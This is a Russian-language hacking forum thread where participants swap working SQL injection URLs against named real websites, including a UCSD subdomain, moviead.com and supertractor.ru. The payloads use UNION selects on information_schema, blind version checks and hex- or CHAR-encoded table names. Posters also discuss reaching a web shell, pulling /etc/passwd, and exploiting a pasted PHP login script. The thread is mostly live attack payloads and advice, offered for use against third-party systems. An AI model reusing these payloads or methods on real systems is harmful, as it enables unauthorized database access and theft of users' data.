http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,2,3,4,5+from+informarion_schema.table/* бывает и в 4))))))))
ОЧЕНЬ ДАЖЕ ЗРЯЧАЯ))) только вот limit с union не дружит (как мне помнится) и or/and не льзя использовать. Хотелось бы и самому узнать что в таких случаях сделать можно
Не хочу тебя растраивать но не бывает в MySQL 4 ветки INFORMATION.SCEMATA а то что она тебе пишет Access denied совсем не означает что данная бд существует: http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,2,3,4,5+from+AkyHa_MaTaTa.My_HeRo/* Во всем виноваты подлые гранты если бы не они нам бы прямо в лицо сказали - ни какой ты не HeRo.
2 AkyHa_MaTaTa.My_HeRo спс - буду знать 2 +++AndreyDevil+++ Я так и не нашел где заливается - может плохо искал. Зато нашел SQL http://siovizcenter.ucsd.edu/admin/selectedAnnounce.php?ID=35'/* может пригодится
судя по всему скрипт _getImage.php берет реальный путь к файлу из базы. с помощью sql inj - можно поискать в базе этот путь и обратиться к шеллу напрямую. кроме того как вариант в базу можно ввести libid допустим 55555 и путь к файлу допустим /etc/passw njulf при обращении _getImage.php?libid=55555 будешь качать файл passwd
вроде как, файлы хранятся в базе, а не линки. http://siovizcenter.ucsd.edu/rq/_getImage.php?libid=-223+union+select+null,111111111,null/* прав на mysql.user нет file_priv N обычная скуля ,с не совсем обычным выводом. http://siovizcenter.ucsd.edu/rq/_getImage.php?libid=-223+union+select+null,version(),null/* 4.1.22-log
слепая(могу ошибаться, но фантазии не хватает) http://www.zork.name/?view=1)+and+substring(version(),1,1)=5--+
Порылся в исходном коде...вот: PHP: session_set_cookie_params(3600); session_start(); if(isset($_SESSION['username']) && strlen($_SESSION['username']) && isset($_SESSION['password']) && strlen($_SESSION['password'])) { $s_username = $_SESSION['username']; $s_password = $_SESSION['password']; include("include/mysql_connect.php"); $result = mysql_query("SELECT user_id, level FROM Users WHERE username='$s_username' && password=Password('$s_password')"); while($row = mysql_fetch_array($result)) { $userid = $row["user_id"]; $s_user_id = $row["user_id"]; $s_level = $row["level"]; } $num = mysql_num_rows($result); if($num == 0) { header("Location: error2.php"); exit(); } elseif($num == 1) { $course_id = $_REQUEST['course_id']; if(!is_numeric($course_id)) { $course_id = 0; } if($s_level == 0) { $result1 = mysql_query("SELECT * FROM Courses_Users WHERE user_id='$s_user_id' && course_id='$course_id'"); $num_c = mysql_num_rows($result1); } if($s_level > 0) { $result1 = mysql_query("SELECT * FROM Courses WHERE teacher='$s_user_id' && course_id='$course_id'"); $num_c = mysql_num_rows($result1); } $num_c = mysql_num_rows($result1); if($num_c == 0) { header("Location: error2.php"); exit(); } } else { header("Location: index.php"); exit(); } } else { header("Location: index.php"); exit(); } ?> Реально ли здесь провести sql inj ? Проверок нету,разве что на существование. И ещё вопросег: там проверка course_id идёт только на то.является ли значение числом...можно ли это обойти ?
Офф имеется...А при mysql_quotes_gpc = On какой был бы вариант ? ЗЫ: на этапе $s_username = $_SESSION['username']; можно вместо username подставить запрос?
Почему возникает ошибка при таком запросе? Что-то в синтаксисе не так? PHP: http://www.moviead.com/display.cfm?id=-1+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='users'+LIMIT+1,1--
Сессия храниться на сервере со всеми данными а пользователь лишь передает ее индетификатор, так что думай 2Byrger без кавычек Unknown column 'users' in 'where clause'
2 Byrger А ты кавычки ' замени на " http://www.moviead.com/display.cfm?id=-1+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=%22users%22+LIMIT+1,1-- типа так!
Мм, я недавно начал заниматься sql inj поэтому туплю маленько. Вот например пытаюсь подобрать кол-во столбцов в db_galery http://www.danieldefo.ru/gallery.html?top=1;-- UNION SELECT 1 -- Ошибки нет, возвращается так же страница =\
http://www.moviead.com/display.cfm?id=-1+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=CHAR(117,115,101,114,115)+LIMIT+1,1--
http://supertractor.ru/index.php?rshow=price&act=viewcat&cid=-1+union+select+1,COLUMN_NAME,3,4+FROM+information_schema.columns+WHERE+table_name=0x6d61696c696e675f61646d696e--
